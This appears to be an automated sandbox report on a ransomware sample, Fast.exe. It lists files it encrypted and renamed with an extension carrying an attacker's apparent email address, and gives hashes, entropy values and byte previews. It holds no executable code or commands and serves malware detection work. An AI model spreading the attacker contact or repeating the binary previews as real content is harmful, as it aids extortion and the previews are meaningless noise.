    SSDEEP:192:V0CNyOrUgfECwStHM6Y42Lwb1QCvAFFycMEVebKHf8EabJL17w5Bsl0ttspxs9TD:V0Cpr9wSpM6Y49AFNvf8EVWMsns9LgA
    MD5:0E698C28CCF6041745567A7E2A36DE50
    SHA1:DB364E63B6BA16377E10271A98855972E3F659CC
    SHA-256:E332C366139207A5D9187DAD50F990C1210CC72643F858C044C0E630A61E686F
    SHA-512:13B6E395ACE13ED1D555DDFAE7DCEF9641F259512CC9351437849E95CD12F8504835C3E613DA2A4B4160B8DD25053EAFE3A2EFFEF9049A0A1DCC360507832EC7
    Malicious:false
    Preview:{.n.5..1X.._P.N.!.....@.w\.;?.V..{...q..Bs.H....M.=..5Rk..=\...N-On.DK=...j..S.^....W......g6.c....,.......>=.......2MF1.?................2._Sl9.V]V..].'.F-...2...[..r.G.4...qs~......D`....0..........?......a....ut~....1....M.>.......-.vXqk4H}Q6^.9Zj.X...G\..u.L...sb:.....INbq..Y..(.n..U..j.0......Cz\..x.2+/X..}..X^W2t...>...`(D0.W...D.-..V.....D....y..R..+>xEhP.0<....a.....`.......m.k.z..*....3}..J.3.-..C|........).+0......JJ.......bci.v4.M.3x..S....;&....m.F.UP.|.7Va.=..o.!.....E...I...,.K...x..( cj;C.b&yE..3..gN.;..1$Z 6 i6.U.6_...s.X........ ....O.>....S...sN..9y....;k.h.w.........&...B|...!..d.q.....u.A...b.Y.......e.....P..A...-d.!..TD.....e.....HI.=r..U.).2.P.L.>U....+...=+.Y.-..3...Or.{^..I.@.&<..^n.....m.=..rV6.a]KQu.|..H....`.)P...M..T....Y."..#+...Mi.kP).....n..v..Kc..*c.t......ro8..<C.4'm......$j''..f.RG......f.LW.p..Y.....e..Mc5'e...).`..R.E..6az.y.@_:`...o.C%ko.Oj...Q."P#..u.R..../..e............Q.B=....`k4E..b

    C:\Program Files\7-Zip\Lang\ug.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11618
    Entropy (8bit):7.983789560123763
    Encrypted:false
    SSDEEP:192:u4+p0ebQ2mCRNFSw+AfmiDDyNfp/v7dTaGB9TidlY+pmLji3Nq2FykuSYvRPsFm4:uf0ebQ2I1AfJDONZvRTf7Lji3M2F38R2
    MD5:85AF8A5FDECAF36B34CEAC8D469DA6D0
    SHA1:2EF8EA3092D6134D3FEB1DF523BF38CFF79FB772
    SHA-256:C81B8DB1F1F23A03E1A8C19852D01E092ABD6FB8D5AB2D3F3308983C5DD95067
    SHA-512:49D40068AB12F78E9387F75F9B43281587CD43C6CD4175069EC9CF1C65A38147613B7DC4A971E8E2FB3F5F0E5EED5D54169FEBD9E63CC8AD157EF903838FB2D0
    Malicious:false
    Preview:1.&p..C...a.>.4...>..E.U=.!.C....y3'..y.".7o...b...W..@.L@*c$-m?.#...|.!:Kv.zl(.m.).".9T` j.CHA..(.g,...0./..w|2.....:...xG.........8.d....W.*W..LpH....EW4. ....8y7~w.hS....H.E.GI..is..J.$.p..#....`.._...|.x!G..t.sc..(.rE..f..u...W..Z'..E...........B...w.n.k...>.}j{.r..-+0.Fbe....k.+..E...7.%6......)2#?.".........q..?<%..4.HJ1..).t..v.Z.wP.!.d......h.V..7.V^.Lme......].......D.$.....".&.~L.....T..@O..`.1.%..h.....f..".._.rUS.+..:Y."...3.........Z@.2...w.d&.5.?....C.@...m<&.F.).".2..3..b.*..0/.~._......?.!.~.T.n8l..LXE.F.+.2t..."...R#,9..n...e...dCI.M.@j.=.k#(.......\.........]..3S....F.....:t..?.@..)@..m..._..n..m.Y.}).Q#..|M...$..w........B....)B...B...yn.,.._....`jv.....l..=..j.....t...Ug...$uo...1.[.3.'=..[.[..pa ..Bu.......!|,.^.g..V......S.(d.....<...&..V.s.v.....9.....P....A.@.?..R.....;...=i.....>.6...ti....`.%.........5.e.k+...>Z...Z.....yw.9D.G.S...]1.}..|..s.b..1'..g..l.y......&..>k.X.s.....%/.....f..I..\".h.e...A../3..o.A.:.....k!

    C:\Program Files\7-Zip\Lang\uk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):16002
    Entropy (8bit):7.988064451942933
    Encrypted:false
    SSDEEP:384:80kBA7KWWkH69W73w06lvs/6qdMpVOTi7S00Q2cB8/A:8PA75W+69cA0gs/t2VOGulQJ8/A
    MD5:C74CEE035AF262E126B6528D9CA4D060
    SHA1:601E456BDB62520BB958C74A85333EFCC93C37D4
    SHA-256:76ED0DC80408F558D76F772F31E1CE0E33640496BDA93C0383666A07201384EA
    SHA-512:F172DE43D27AB4D570AFB11058C6C1DFCB901E67BE0764FAD50E8AE88D6709AD2F5C20B02716375E875C0693464FAFB9686C877B558B6CC785939C0A4EAA8AA0
    Malicious:false
    Preview:xa.!.;..qa$k.JY...~.h..b$0a.(~53...D.....Q.....#..(Z..<..y.......c.F..U/p.../.4...~...*j-9....0..r...".."....|.]..O..I.3(I..y...F.ah.\. f..{.()&.6R...r)<...)>.7.....Gl."..y..m-....&6aH. !......9}e....R..Fd..NB*.d^/*As.nU.j.../?....P.B.......z.......H..c.....)D..qY.........C..[u..<8....>.'.....E.,?.......j....a..........<...i)...G(...{.) .............~....(2AW..A..."?I...o..X.Eqb.`g.\..hr$ q3.{B.J.70.#.!._....XM.'2.Ke.*...}...s..TJ.AcW..D.....kQ.......S.*.(.9P....\...4g.......X...sO.M.*.8]g.7.........a...#&lh.6.2.".I..v7w...f..\VX..X.#._x/.te.U......s73...q..B..I......+x..P..Bd>...u.E%.#..Ov.C..a.Kb....T.....(..$...i..p.Q.G.CR..$t..3Y..<.5H.M........<..]Z..-x.R..J.V....~..{.'f....r9O7.?...R*H..J...[?t3..J..........~.q.ULs.g@O..;^.)./..T<...S. lp..4EZ........$.......\.........6{.,...r.9..."..H........DH|B.F.V...t]...v}.{._... ....q.`.?.A*.T.(..\l....."r..{.+=.m..*.....G.D.C..!..Mi.!~.,.-...{Dp.H$4T....eh.!2.....Dp.....7..mk

    C:\Program Files\7-Zip\Lang\uz-cyrl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15410
    Entropy (8bit):7.9868091309213085
    Encrypted:false
    SSDEEP:384:id/nE3FBl5n2lOVEu7Wy4W4UozVXg66Q0GCYUCm8JQ:onE3Ff5nE7uzJIzVF6DzYUCpQ
    MD5:2B4ECC3B55756C73AFC8E0E3B644FECD
    SHA1:A0A2F08A5B33CABCCC880557236DEF7097C0DB54
    SHA-256:AD106C6E9381C96BF367AE350D0836140829CD7F976F02959C8435D9E5AE1E6F
    SHA-512:A020139789BAB0484F7E96564333AE5ABEE93D90A32C469519DAE7A071C1ABBE0744A544C4C6B4163F4FD3D7155BD319D9CDB370F96379C65DF473751617E6F1
    Malicious:false
    Preview:....[..a...../~.(..)w.#?.Y>.#....B9G....(.Ni3!\...m.....MOy...S....[.....bL..D"...8...5.....D...n-i.q..dPq9..k......*...y..t...md...PY.$.~6..3L.f..\..D...3b.(.....?/.01..?Y&.).h.r....jS..|....,.0...F>.......D.k)..3..N>..A.sn..m.)...j/pe..Y`.r...K.ie.|x.?{L.`6T(..3.6._.MD.f..../.<..A..?....=..><.b...........#...ZY..}.q....X......qX.|...C..|8.M.W..(;.y...8..de..m...4...00...cW.X....'.....<..lL.P.....0B.;.SD.5.#h..].+..#..0xw7.&...%..Z......q.nd[...'^.Pl..I....2..`.B.ZYD. ..onpm.vj\.A..%. .. .4......y..5..}..>.....K56.....'B.7..)........!.....adn@R!.....Uj.....Z....$vT[.P.r].........E...6.....[...H(....<.p..:..Q..-.....#.L_....,..Y.{XE.a....S...p...|\...l..."...V.2.bfV.#$u.S.c....5..N.k.l.....;..s.{.).....1@.&.....B..#...Y:..@"..W:.N.N..<I.PP..].t.L]..Z....pWT.o..... ..%L......X],P.+XD....S..ef.n.2.5A....s.... ../..m.V.+.d..a.a6^RgJCC...8D*+_.IO..?.R..v..H....K..Rw.7.>C...xU......\..!.j.UU.~......../3z0a?..{.~......L..kf......|.n}...%...37....

    C:\Program Files\7-Zip\Lang\uz.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9618
    Entropy (8bit):7.979440769866654
    Encrypted:false
    SSDEEP:192:78MBBRl14d7/hAJPGDDNh54PWcFe9/9DeH83+/WYlRA:I/d1genN6W4qd3+rlRA
    MD5:5FB6EF6E81DE16E5E3F3E9EB67BED0FE
    SHA1:6BE450A174C5C1F07871FE344BEBC91B9DFD6910
    SHA-256:81C501851149AD7453ED299C151C51A597A62DB61F0840C4F93CEE4F8A8D9E45
    SHA-512:F2D1CA138D89F656F980D64B811FC6A335F6F9BAFF1C7AA4E9021513545B2C2BED1257AA14A1AD719A1C9DF127BD003B6A138904E7499F285FD8C24C94E1B9B9
    Malicious:false
    Preview:.#..)..F.O.@..rU.(.v.,.qE.....K....M0.'...^tO.2b.@T.F.IO5.@C..C....w[0..y.^..w...~R...km....>I..3M.~.r.! zjie..c.......D....2s..(.ke.+.Xz.1....X|..U{.rS.l....9$.8v5_Ad..4.;Lq..f.6!..U.......6.P..8......y...#.r..A.v...MP<....5....g%L0..*..2.\.k.......\.\.......5...J...C.`]?V..[ .i../..y..U..{......GM.TsvL5....z8`.q.......g..US.k.;.:"..uv)g.$T~....8.............Hy4..=...;g/........n..'F"..u_Lq9...@G....O.%...UA..z[.....A;..j.......fm(=B..0.i..WQ.w4..hnw.KS0"H.w...~.!e..N<...w..!../..H.G|.....t-...wm:i....*.i.Gq`[h\R..;.....ag.|Sl.....$N45OI.c.d..a.K.....+.e...a......g......Xo.FqZ..B.k..n,..y..`z.L..l..E:.C..+z......P.(o.J.}vt..I.L...6.t.....h.l..+.8.4}.6......8.S..M.......O.... !.&r...&...g....o.wjh...1..w..;c.....V....7..i.ch!R..1...94\n..M....d7..3.V..6/.1..,......</N.."....y....v.B.uY..Q.n$.l.n'..W..lc@.A..:.ss;#.0]..As..K...4....Eh/.y..#m.. ...PC.Y..j..7jX..X\.39....k:.p..?F..^.>..g.2j..%M.o.LQ..Z..f.6..3.X+...]M}..+N..U.......8...6./_

    C:\Program Files\7-Zip\Lang\va.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):6658
    Entropy (8bit):7.969632873152686
    Encrypted:false
    SSDEEP:96:GGrHO5JfrFCB7xYONzFWo3qAUvOC09ciZNiYDwbJFZghy/1c4mgMLkLHGRBWs7i0:ZrUrcHN1X5/MJJFWhaUkLHGv8LMU5A
    MD5:257279D631B4E9CFE00C25AF6609662C
    SHA1:E7D4CF4DB5A6DA56189BCDC646AE312D7C82BE7F
    SHA-256:DDB5ACA9589A37A260DF45EA0D02295577543EA6984F028D8B2FA17FDBAF55FE
    SHA-512:88463843CE8E5D2BB4F4B136AFF9DB03D212C8EEB86BF8A418AE711E0A6DEDA7A933D88DAD4987CCDC3DE1D51C28262512FA2D7D5E1B66379B7DC10704AE82D2
    Malicious:false
    Preview:.y..B..a.....9)^..d....3...i...t..D...cx.7P:o1.... N...|I.q .0i&$..wB6.......F1..../bdD....7N.o.......+.9...GMR....M..1...A[.%...+O`......|.Gk..t.m.'.../...1.x.[k..2.-_}.....;Cr......N...x*.~.7....hh.b...[..J....M?.|?.....z^+...]h....}.]..&.....e..Xf.PY..6e.....10...T....~W</&%jQ.Dz..C.'.6T.....S.Xj.~:2.........f.F....#../.=....R\"..v....-....;."vQ,J$......[..P......6...N..............{._8.R..mGb.8...r.N..A.....Y..`'$.=5S1..>{/d...R...;.KZe,.e...k.-....jLw..e.y...9...GY....E.l.a..h..|@." =o..4.DB=...p.......B...t....>..;D......R..Z]..x....B....^.m;T.m-Z.....n....~K.o.{.8...L.7t..N....,s5......H..Jy..u.K.CR.!.z.......$.2.I.\...Z..x[8)...H.....c....Uv".......@...{$..z...f.y.G..Q'..yl8|.;[...MV..~H....y..p..v}..U.e}BXFoG.n..UB..S.U.......j)/g.>y...5.'z.mh....jx..).-f!xi!.-.8:..G,U...>*x.}....{a....Y...8...E.-`...pp+.p4K.j`..;O.C....tc&h..em..s.i..Q2...({....n@".......n..b.+OW.}gdTT.x.vpm.I#t..s....t..M4...F$.,..'..g..H;..,h%...09..1:.I...$6G..(.(..

    C:\Program Files\7-Zip\Lang\vi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8754
    Entropy (8bit):7.97623845041928
    Encrypted:false
    SSDEEP:192:sf4ABhpkfFXqi+KOQdDXMpFoYvqxMXrdl5fk2MfPC/pZT96NaeakxA:s9hQFaHqLmqxM7drfkDKpZUUeZxA
    MD5:38BD7F9F5BD9C1AA5A28FDEF30410814
    SHA1:629A67459543953BD54785F6BEE70D00FCAB394D
    SHA-256:89869CE72E215BDC5427AA142AF40AEBAC6163AC55AB9D1A2E4F70F98C13590D
    SHA-512:3439C818B3CE735C22D157600DC3ADD4B4F983107E70BB0B17977CB7ADCD47A67A8FCFBE43EFCA71071E04598BF8DDC035CB3D0EB51F3D82D2E2F3A66A2C5973
    Malicious:false
    Preview:yC...L.2........k}..6.4Z...x.....^1......#RP.FO..i...d./..(..$....!]Np.s....k:d..{A!S.l..M.R!.q....h?R....$M..IVu.%O>...7..FY..*....^.@.5?k........".*4.*/D9...Ge..m.].s..{T.`.".s..Ay.5.P.yh.h.#.....N-.:2x,.....n....+V..z..}..*..s....i.&W..,..0.+d..H...XH.I...Z.Ko....JD...."oP`.B..4..)......;..w..m....:.....Z. [..X..=..7O..=\..*......j|....v....{a..Mwx..?.O.....w..i6o..../'.#[.Mq..AE...o..{.I."O..[kA.d.J..j#. k.jz..g...5/v..._..Xc]Z.x.S..6..6.~s.....J......L...x..d.IiT..v....*].~ ..|G..^...*9..4..uB.......3.....[ ..@..4l........A...<..Vi..@|Uj.t.EW.h....y.L.t.i...*......yT........,..Wj{..........W\..f.`..V..s,u\....]7.|;.U....1^...|ml.N}v.%.....1k.;.fM..Xy...p.^...y......d-=-uA...XH..2O.SW.Z..<.!..sn"G,..Q#...f......M..<.....-Z.R.M1..9....B..$....{:j..Ya...{.3$....@.C.8T2x@0%b..h..@.@.^.T<\O.zs..:..k.|P:.~.m.*H...t.U.).;.......G'..V*t.....| ..*i..i.s..Y.#....R..8.$.85z......fV/.h..|.G.G..j..R.h&T....i.."n.B6`U..o|....:..0.Ez.....h.;|q.T..O

    C:\Program Files\7-Zip\Lang\yo.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11202
    Entropy (8bit):7.984502349267868
    Encrypted:false
    SSDEEP:192:9Fw8VKVXkBzyf8ndgYivwIulXQFb1P/EbIczFbgN0JsBwl6mJcY9hD7DA:lkXkBzyfOgYqwHlXQLP/MFbI0KBW5fDo
    MD5:4A48E38D9795DF70B71DDD2070817110
    SHA1:3B1EE9FDB64570B2E08B1E0133FEF0D0762B6834
    SHA-256:3A716CB94FF8270F853891167104E7A017F0A8BB3A2499A30367017A281043EA
    SHA-512:3A3E159068F9CACC8A1FC539735C92731B75A55438EF5D2168B951084AF3773E488B8D31CAC9F15CC8B1275A67B68FCBF1A63FB050DB6F38FB9F41FD8649FC9F
    Malicious:false
    Preview:..V.<.. MT.n.`...v)......s......f:..(.\F,.a..D.7...>C.?j...T8xy.Rn.z>Vg.s.<...lM..T..d..e..GQU.D....".....u.myV:.}...I)h6....v.I.....S].....5?..;...Fz..,..T.Q..{.$.. .gO.}x..x.so...u..v.......Y~.+...t"..0;..\.O-..bf5!.b'..j.\.Jj_.):.AG......Z....JY...{r.>.zD].....(x..zV..;.F.......P.....2...r.iZ.....L..|...B.."....m..k..D..v.D....TsU=,.-.X....V[..l..1kLM..u....>...<..... ...E..d....ed.Q!.q..U......n..5.E..[...b.T........(.....a..lT.|`....s..E@....Ojlr......M..C.b-...Kv..T..Oj.n.Z.Z.~P!"....:...y.. ..k..7&'.(n.)....;.5D.r.84.I..f....X..w..x=....B!6..-7..2"._l..`/.a........wb..C_..M.*.-..y....R...@......2...........~.P.f..HNe(.'........[...m.n...k.8.3"...h.. ......[:Y]...e... *..<.kFb..v5..T9<T..E[.g..0.Z.yw.....d.q.0....._..{]....u...".#....\....j.*.S>f.c.Nk.....4.D.h..f..NS..]c..h(.a....5H...3.X!..2.&y.9.@.)^e..@..7..3..%....k.*..j.6.zj..Lh.H....../*z.d..-....l..~..5.7X8..........p..-..\...5...R......._..Ab>....t...%.F.pW]I..z..x....._.wW

    C:\Program Files\7-Zip\Lang\zh-cn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8514
    Entropy (8bit):7.9791135115213425
    Encrypted:false
    SSDEEP:192:OzjRoFEDXv/k+AFVsvxAJw2q/6p4Ovrp5YRx2SZBl8mWn5HUdQ:OyFc/Mwxac6p4Ozp5YN58mg5HUdQ
    MD5:334F95AA2DB3E80D56D33F75B1D263E5
    SHA1:4077DBAF68D1E3A866E5CC04BA8D110C1F7EDA96
    SHA-256:CCF2AAA3BC41EF617B0095AC27EB1E0E2E6E8D5070C507F980593F8C3A0BA15C
    SHA-512:76EBAA959DD76227F7FA5BD9DDE9C41366398F76B1194C0D732DDB0B2838978C8DCEA92B2EF88E024C5AF7A539A195A131838214C39A1CB86808806426C6D1D8
    Malicious:false
    Preview:..x.....y].YdyH......../?..$..=..vN..j'.........S..f.....t.O.E.9.l.@AF..;..l..~.Py...k.A..].n...`.......Lk.2=..y./.M..Q0[y^Q..J.V......F.0h L.*=..M......K.,.d?...<l.`Y.).....&._.e...3.)..oi.....@Yv..k..G..4."uw.S:s.L.A.....".7Y...FB.@R......<.f.+n3....s.|z.t.._]r...q.R/....M...7.Lu.......|'...[d....y. iP..t....X..Ug...!TAN.2.z...".nP..`.....s.g....H..3.C.?.;&...2..6Q... .U..'m.G.7n....P.e*W.... ....mK.U....c.P.>...}5.`...O..~....y+.N0...2..txc.X$.1.-.+........pk..)<.....@5...w....q.!+........{x5|..#.iz.'.2.r........8[.P..../.V.>8.f..V.2.I._..]'i.`.Ra)...X<....qC2.].0.eS..*nOt..-u..){m._}&...-.1D.O.}..+.......9\P}o..J......]....B..4...s.p.,...~.9(...~X;...V...?...>GZ...a.L.....=._Ym6..`}.!j..$.q...A. A^x_5.X......IJ..n....$.M....\....7.7*r5..jm.....K..a.9.....K...0Px...4Z..%.....0....w/..Z.....t....g....dh'iX<..v....*).U.V.Z.Mwe.*Y..K...d..nVR....5.3).NT......0%~.Wl&...m.k.t....f....e{.@...trV..m..:j.d.d.*.P..y.a..w5).......y{m..U..^L.[.

    C:\Program Files\7-Zip\Lang\zh-tw.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8610
    Entropy (8bit):7.977449473781163
    Encrypted:false
    SSDEEP:192:xf7cU5F2pZbLW0gnOWKwTWkAFdJyCSw/LOmHRirVYs7rQ:xDNF2pZbSCWvTFAFdJyCSUxoSwQ
    MD5:E54FF5B24EBCF44B3F531DDAB55BDA64
    SHA1:864FF8AB951C6D550C053213840FE81298621501
    SHA-256:4F77972AE007FC00C9D4FE0A2C78563FEC932C0161EEDC77C691419DA3ED737C
    SHA-512:6B79304CE81DDF45D2E143FF2859520A396D1258AA8DD4F279210FC41725E97A3DE62A8E3D718F31CF4DE9DDDA23E5B992030349EF80533BC031F7E1F12F8B73
    Malicious:false
    Preview:d...uj.v.....*^$..d}..B..V....T,......*.@\.....u....q..}..W.>.^X...[..=KVB.......W[.(N.@i....SM#.|..Ge...D&6P}..T.Mrg{...*......s.g..p..2...........f.3...i..N..=...PI..T7.$]..w.V..n,a._..R...%GG...S.}(.....c.9..P..C.........3m.,....R...qd......t...%wz.|.'.:..m......j...P.@6.g(.fz.L.O:...X......kXbi..N,%...SA.@.E>...U.r..i...S.$:.J...u.Y0{.<.N..5:....IW......D..)...4o...&.....U... ><.h(.B|..rv...q....!..v.[....%*..^.....dp.....;..R.^.=.m.g.. ....^.#...?.<=..$@. .|.7:.....#.`.%.p....m.O..........6...."6.+..r.2L..b.RI....)....L...@iz....+..;...Bq..A....D@...Z.79q-S...f...E;.r.3.....C./M...vm...^#.._.(..Z'.&0....m.........L.k.... .....}.h.......A._.FT}.(..R/x..{..an.7B.9.FwEhmyq....aZ...L... KF......[.=....l../-..3...........p...".._g... ..+$.1l#t...!..RB..eA!8....J..w2.....l.<a..`9L.&.n.:aeC.;..f.].........X...Y.z.:'.n..0W...`~...~..9"Q..t,..` pA{@Q.Xw. m...S8v.QszE.'Su..-....._.h.......:M.........p.6..lQ>/+....Z......."/.........1..xu.gy

    C:\Program Files\7-Zip\License.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:COM executable for DOS
    Category:dropped
    Size (bytes):4242
    Entropy (8bit):7.960198561614512
    Encrypted:false
    SSDEEP:96:jJoU5tbBEX39K59XPHYR781WHlMrjj7rUHW2QhNZdPe2zfQ:mwtbSns59XPHEdHlMQ0hNJzfQ
    MD5:BA1155B150169862CF508893A34EE633
    SHA1:FC873C1FAF68551D3737AB9A76240739735705AE
    SHA-256:E050BB6932790A6BDAC3CB1AFB633EF5A1A404AD39400D4F5CA6E0B414B66469
    SHA-512:29CBC4103991FB4B66731E04126B9962FD30A9074410EA8467E18F25202BFCC35296D5ECD6462213C5BEFB332D33ACDDA47504A9F2E9197DC2E07BAD4AE69A6A
    Malicious:false
    Preview:#3.!.c.9....A.z.kl^..=..L.K...5*...]F.8.Ts.&.9.z7t5(".<.....a] .@|.S...6.....Ns.,...j.U.a...5f.K..P.,^..r.ue5.c5.......M..yO.....Y^.....n..9......J.C7v+.W....B...f.}`$.6k'..Z.g.! .Wi..|U...........^H8.`D...?:..`......u.....*........g.....2..tHHy....E.\9.x.5..\KJ.2S..-.Q...%.#F$.....j_Lp...U...c.h]..aAH..T.}.Jp .(....c...N....8&14...7...................OP..,.n....6..xN..CS.../..r.{^..Q..H.{.d...M0).2aRn......x.6.V..:..lx...U..~..~...i.f.E..........N\k....b:......j... U.....U.........tB.....*k..5.Y.gJ...../a-....k.....1ry....q[.q.K?[?.|....l:.U.B...7Ch.".H..L......V...2&...Y4O..M...W.....Ov.4.@h.z..gP.Cr..R..'........jJ.U+..(....y6...".......9....}...&WZ...b...1%.s.3..~.....3QVd.$.j..f.'.P.2g.m..#'.Vt.J.0.x..v.",....gP..W.".WvR].....H...".#..e.......k.'..XV....:....`/....!...77...^..G...7dQ..\..r..([.....Lj.Q............,t7.....46..>o,.n.@....C.....Q.....:H.FNU.B|.F......a..id.k.....d....%..b.2;"N..k.?A.QE.^..N.<......!......t......../'xFg.V.

    C:\Program Files\7-Zip\Uninstall.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15106
    Entropy (8bit):7.985269698708576
    Encrypted:false
    SSDEEP:384:D7ahhgq8yn9I3Kn7KPsCXMlcitSArIWfFSC3DPSBw/SzDrY2wm5zyHQ:hJ3Kn7289tBI6zPHKzDXHpmQ
    MD5:064705F617EBE50BB308FF5A84569682
    SHA1:321737F573AC3DEE357B527C6E39144D9219F14D
    SHA-256:C5C03EB1DA28B25688F6B672E01F6C9644D0F2CEBD8ECB3CE4EEBD2093893A7B
    SHA-512:149BE8E29886ECF8FC7BF41C3FDCEC0EF2F65AF054FCE62A8CE4BF4CA0C9D04C33623B22E2A32C1EEE3983D5582287EA928EE4766001BCF47F609957E0BF70B0
    Malicious:false
    Preview:dxp..}C.A.]...1A..^...B....!E.K.....tG.:&..K.[..c.7:.R..... tK7.%y.k..`..L7.....(H.i.*h.Q.........kE....N.u8..E...Hv%l..}q.O}..qY...o.....V.X{....Z}..D.^._.V....s"..Q(....F...7g= .^+.9..H.t..~....I:.).s...~;zh).XU..i...dy~q..73t..|X.D.......C.tJ"......\..%...)G...Cg.-Neve.......x....d...n..ws.1.0..ci.P.4....0.M..j..)..........D^..X..A.......F.,....r...R...Lm...Se0.$^N.4...Bi.....z.7?.'.Bqh.VEq....;f.F..#..?..k_.u.9.Q<..+v.)u~.i.M7..>@).&OJ.x....]....g?.~...P..{.h...um........4.]jS....J;.h..xpJ.......5...:.....^.........K...<....^.}.ut7.....i.*....y.t...<....2.....W..9%4.y..7...}`..d..9S..`.:%...YB...z....0..}.,.L{C..4..[....O.%....E.[.?.z.L...$F.^..OQp.......zb.^.....[h.p.O....Y...i8g...e.q&x.z\'.........&....g|...h......F}he2....TE.../EZ^......m}.X.A!8..@.u.u.R...u..m5.k.n.[rf.E.....h...0.. \v,|..U.l..\~....wU.g..c.0.?/.z|...~? {%..4#..5.@m[,(....l....<.cv..ur....\.....3.R'..<..iSl.T.=C..:......(].+?..z.y=C.:5^A....2.:."V.fx.@J#......x....9.

    C:\Program Files\7-Zip\descript.ion.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):610
    Entropy (8bit):7.564061946783669
    Encrypted:false
    SSDEEP:12:AZ0UHvuHQA882RwROJi6sED56cRuChjnbwaBm39Lc:AWiB3H95dZhYKYQ
    MD5:FCAA7326C5199BB808FBA1D826E740F7
    SHA1:5AAC720AE0DB163F53B72FEA2917DF1A56F946EA
    SHA-256:6C66A49A9096A34DC51FA1394B807F2AAD7D5ED9811EE6D75036D3AF3CC5F288
    SHA-512:6018CA1080BD8CA6E1BCCC03B6E05F5CB81F4435F5B5375693DA941B6C738609FA6CD5246A8BFB0572FAAE00413BDB0691695A13C355D99C9A065C175013E7CA
    Malicious:false
    Preview:R..I...f..Z...Z.......txI'...;.>...U5I.b............ph.....[h.^k...37.IDi.!j2R.)..{..73.....y*..t..L...s.6..aOl...z.;.1.>4<....UqL...w...a..^xo'.T.f..&..Bt8.5......XZl-...,<....r.<..8.}.W..{Q.o.[.v.e...*)..b}.....G.p....7.....H..H.~<...=.1o.8]...u..bJ.y 8..a.KN24Fx...;3.......Y..IC3Y..P.H.u.{K..VgE:.....^..(.:...4.......l.W.4_..oo.....U...#...n.c...q..|....Bpd.hw9w...o.u....+w...@.=.~.2..7..>R..v..D.p.v1..lw....................D..\IjR..#........I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_

    C:\Program Files\7-Zip\readme.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1954
    Entropy (8bit):7.884327278264781
    Encrypted:false
    SSDEEP:48:bYO8mUXBBfrp0uswjJPeHjnSnwCYUoqtKddfM/g46Q:SmUXBBrp0uvEDnSwie5g16Q
    MD5:6D60BAB61DF258A68A7AC98A418233F5
    SHA1:378310936253C4F4239D740A60ED7388920FBF43
    SHA-256:65C437C35EFA5278817887F8B2C11B9AF0AF4200F7B905E8C40CD019192C9E83
    SHA-512:CC78B46448CB559EEE55CF4C06CFE130162C0C33AD3C5ECF6A08695F72F8F33D9A8E60B07197E6F5F3EF9AFD02D1A472E5A8F30A2DCEB32055399F94EB880381
    Malicious:true
    Preview:.J....0=e.{t.|.UZ.8.5..cT...#....9...w.N.4IJ.B..2...AV.g{....#v...u..Y......n.....D..!........[`..)...mCY....aG....<.;4.1....x.W.D\...A.......).,..9.t"..p.%.kE_.V.....k.K....D..i0g..c.......#Z*U#.'..OW.,...MI_..a..v.........qJ...N.O.B.k...I.&.]..".4..&.g(..JHj.XN.<..Ye..g>...W...hw.A....2+f.Z....w........n.{.@hk.3.=..l.....S...q.d.........X.....v`T8......Mx.z..7Y.Bh.h.$...rj..:.S../.Q.e...!@.r.$.-?......Gr..j.:.....z..Z.W.^...F.....Y._.E.)$U.mb..E..'.[D..J..Y.j.._.Zq...u.A...a....G].......v.bF.;..c;.Z..~...6...7..F.o..7L..$D....}../.R..@N.$.c...RH..8f.p.W.!..d..i..VqX.....QQ....:;.KP......zN..0{.k@r...e....PKQ.5YR.NQ......\8..5..9&.?.lx..i[.'1..0.K..'N..C.p.,Y..b.<.Se.3$:A.>..O.Q.>f.1....B.9G.Lu..P.EI............U...Y9'.4U.4..F....\..UE..9,........1R~..h/-d....M...j.c;...w@W......KZV...&.=h$e,\>4[.......k6....!0P....1.|..B.q.*.U&....s.'h?........#........ .`).....a.K<....~.CS....}.............Q.).h?...$F.9......z_x..p.1..o}.k.8..<..e).tg......

    C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):187154
    Entropy (8bit):7.9989893102207645
    Encrypted:true
